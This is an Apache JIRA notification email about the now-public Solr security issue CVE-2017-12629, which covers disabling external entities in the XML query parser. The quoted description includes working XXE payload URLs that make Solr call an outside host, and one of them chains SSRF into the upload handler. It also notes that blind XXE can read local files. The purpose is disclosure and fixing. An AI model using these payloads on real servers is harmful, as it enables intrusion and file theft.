[ https://issues.apache.org/jira/browse/SOLR-11477?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Uwe Schindler updated SOLR-11477: --------------------------------- Security: Public (was: Private (Security Issue)) > CVE-2017-12629: Disable external entities in XML query parser > ------------------------------------------------------------- > > Key: SOLR-11477 > URL: https://issues.apache.org/jira/browse/SOLR-11477 > Project: Solr > Issue Type: Task > Security Level: Public(Default Security Level. Issues are Public) > Components: query parsers, security > Reporter: Christine Poerschke > Assignee: Uwe Schindler > Priority: Blocker > Fix For: 5.5.5, 7.1, 7.2, master (8.0), 6.6.2 > > Attachments: SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, > SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, SOLR-11477.patch, > SOLR-11477.patch, SOLR-11477.patch > > > Lucene includes a query parser that is able to create the full-spectrum of > Lucene queries, using an XML data structure. Starting from version 5.1 Solr > supports "xml" query parser in the search query. > The problem is that lucene xml parser does not explicitly prohibit doctype > declaration and expansion of external entities. It is possible to include > special entities in the xml document, that point to external files (via > file://) or external urls (via http://): > Example usage: > {noformat} > http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a > SYSTEM "http://xxx.s.artsploit.com/xxx"><a></a>'} > {noformat} > When Solr is parsing this request, it makes a HTTP request to > http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition. > Considering that we can define parser type in the search query, which is very > often comes from untrusted user input, e.g. search fields on websites. It > allows to an external attacker to make arbitrary HTTP requests to the local > SOLR instance and to bypass all firewall restrictions. > For example, this vulnerability could be user to send malicious data to the > '/upload' handler: > {noformat} > http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a > SYSTEM > "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'} > {noformat} > This vulnerability can also be exploited as Blind XXE using ftp wrapper in > order to read arbitrary local files from the solrserver. -- This message was sent by Atlassian JIRA (v6.4.14#64029) --------------------------------------------------------------------- To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org For additional commands, e-mail: dev-h...@lucene.apache.org